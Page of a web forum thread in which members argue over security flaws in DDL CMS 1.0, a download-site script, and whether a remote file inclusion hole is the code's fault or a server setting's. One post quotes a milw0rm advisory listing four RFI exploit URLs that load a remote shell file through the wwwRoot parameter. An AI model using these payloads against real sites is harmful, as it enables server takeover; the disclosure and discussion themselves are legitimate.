Activity Stream
48,167 MEMBERS
6767 ONLINE
besthostingforums On YouTube Subscribe to our Newsletter besthostingforums On Twitter besthostingforums On Facebook besthostingforums On facebook groups

Page 2 of 7 FirstFirst 1234 ... LastLast
Results 11 to 20 of 70
  1.     
    #11
    (╯?□?)╯︵ ┻━┻
    Website's:
    Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.com
    Little Dragon im not "bashing" or whatever you want to call it.

    I'm just stating that, genuinly and truthfully, it is full of exploits. Not my problem if you can't find them yourself.

  2.   Sponsored Links

  3.     
    #12
    Banned
    Website's:
    Dev-Security.net
    JmZ you can not expect one to be perfect in all for example lets take a Police Officer his main task is to protect us and then we have the hacker which does illegal use of the pc

    now the polie officers thoughts and ideas are beyond the scope of hacking methodology

    so he decides to make a script and publishes and there is a exploit in it should we blame him for the lack of him not know hacking methodology?

    no we should not we all specialize in different aspects of life Little Dragon might be good at this as you might good at something else does that make you better or not? that's reportorial btw.

  4.     
    #13
    (╯?□?)╯︵ ┻━┻
    Website's:
    Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.com
    Strange example, but dragon should know how to remove examples.
    So it isn't really relevant.

    Anyway, as I said in my previous post and every other relevant post, i'm posting facts, nothing related to little dragon himself.

  5.     
    #14
    Member
    Website's:
    zomgbbqpizza.com evilddl.com scenemarket.org
    Its only the first version though and has a lot of features, it bound to have some teething problems but its a far more complete script than ANYTHING out there now, i have tried them all.

    Why not help rather than saying "its your own fault if you can't find them" ??

  6.     
    #15
    Banned
    Website's:
    FusionWarez.info SmokeHost.net Leechers.co
    Definently looking forward to it Little Dragon . I'm even loving version 1.0 which means the next version will rock.

  7.     
    #16
    Member
    Website's:
    ddlcms.com xsaimex.com warezgod.com
    @ William: Thanks for the report bro. It has been forwarded to the dev. team to see if it is an issue and if it is, it will be addressed and fixed.

    Edit: It appears that the exploit you reported is not an exploit of the script itself, but rather, a server setting, namely, allow_url_include.

    If a server has allow_url_include set to "On", that is a security risk, for any script. Here is the response from the dev team:

    "if they've got allow_url_include turned on, this is a huge problem. The script really can't be responsible for their misconfigurations.
    This exploit for misconfigured servers has been removed in the latest release of
    this script. "


    So, even if a server is misconfigured, the script still blocks the so-called exploit, so it's been fixed already Thanks for the heads up though, I love it when people try to help, so it's much appreciated William!
    Quote Originally Posted by JmZ View Post
    Little Dragon im not "bashing" or whatever you want to call it.
    If you aren't trying to bash my script, then what are you trying to do? Help me? Like the others who have provided useful information and have given me suggestions and such? Who are you trying to fool? No one on this board I bet (except yourself).

    Quote Originally Posted by JmZ View Post
    I'm just stating that, genuinly and truthfully, it is full of exploits. Not my problem if you can't find them yourself.
    So, Jmz, what's your point? What are you trying to accomplish? Nevermind, dont' bother answering, I'm sick of seeing your ignorant replies to my work.

    I'd rather hear from people like William who actually try to HELP me and everyone else out with the development of this script. If you don't want to help, then once again I say, go find something productive to do.

    Quote Originally Posted by JmZ View Post
    Strange example, but dragon should know how to remove examples.
    So it isn't really relevant.

    Anyway, as I said in my previous post and every other relevant post, i'm posting facts, nothing related to little dragon himself.
    Yeah, right. [JmZ, do me a favour and hover your mouse cursor over this smiley ]

    Quote Originally Posted by DEViANCE View Post
    Its only the first version though and has a lot of features, it bound to have some teething problems but its a far more complete script than ANYTHING out there now, i have tried them all.

    Why not help rather than saying "its your own fault if you can't find them" ??
    DEViANCE, thanks for the comments. Well said bro

    Quote Originally Posted by CyberHacK View Post
    Definently looking forward to it Little Dragon . I'm even loving version 1.0 which means the next version will rock.
    Thanks CyberHack, that's the goal. It will indeed rock!

  8.     
    #17
    (╯?□?)╯︵ ┻━┻
    Website's:
    Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.com
    I love it when I get quoted so many times.

    I posted here saying it contains exploits, because it does.

    As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.

  9.     
    #18
    Member
    ^well said, exactly what i was thinking but was going to stay out of this

  10.     
    #19
    Member
    Website's:
    zomgbbqpizza.com evilddl.com scenemarket.org
    Quote Originally Posted by JmZ View Post
    I love it when I get quoted so many times.

    I posted here saying it contains exploits, because it does.

    As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.
    That makes sence but are there any servers that actually have that setting on??

    I don't like the way it is using a number to count the path (or however it works), and even worse that it is hardcoded.. it seems like a strange method.

    But back to that exploit here it is:
    Code: 
    +============================================================+
    |                                                            |
    | DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
    |                                                            |
    +============================================================+
    |                                                            |
    | Author : HxH                                               |
    |                                                            |
    | E-Mail : HxH[at]live[dot]at                                |
    |                                                            |
    +------------------------------------------------------------+
    |                                                            |
    | Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
    |                                                            |
    +------------------------------------------------------------+
    |                                                            |
    | Exploit :                                                  |
    |                                                            |
    | /header.php?wwwRoot=[Shell.txt?]                           |
    |                                                            |
    | /submit.php?wwwRoot=[Shell.txt?]                           |
    |                                                            |
    | /submitted.php?wwwRoot=[Shell.txt?]                        |
    |                                                            |
    | /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
    |                                                            |
    +============================================================+
    |                                                            |
    | Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
    |                                                            |
    +============================================================+
    
    # milw0rm.com [2009-09-21]
    But i tried to find any servers running ddl cms with this setting on (for testing purposes not malicious) and couldn't find one.

    Seriously though if we all work together and try and fix any problems the script will be great.

  11.     
    #20
    (╯?□?)╯︵ ┻━┻
    Website's:
    Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.com
    DEViANCE: PHP 5.3 has it disabled by default i think, 5.2 or 5.1 may have it enabled. PHP4 doesn't even have the option as far as I know, meaning all PHP4 servers are vulnerable I suppose.

    As for working together to fix the problems, it's his script and his responsibility. It's just a script, the coders can and will fix it themselves (eventually).

Page 2 of 7 FirstFirst 1234 ... LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Help with DDLCMS
    By Darkstar in forum Forum and DDL Discussion
    Replies: 11
    Last Post: 23rd May 2011, 07:54 AM
  2. DDLCMS 3.2 help
    By FuBu in forum Forum and DDL Discussion
    Replies: 2
    Last Post: 16th Apr 2011, 02:52 PM
  3. help with ddlcms!
    By cyber-cliff in forum Technical Help Desk Support
    Replies: 5
    Last Post: 18th Feb 2011, 04:14 PM
  4. DDLCMS Someone help?
    By lonerunner in forum Forum and DDL Discussion
    Replies: 18
    Last Post: 18th Nov 2009, 01:20 AM

Tags for this Thread

BE SOCIAL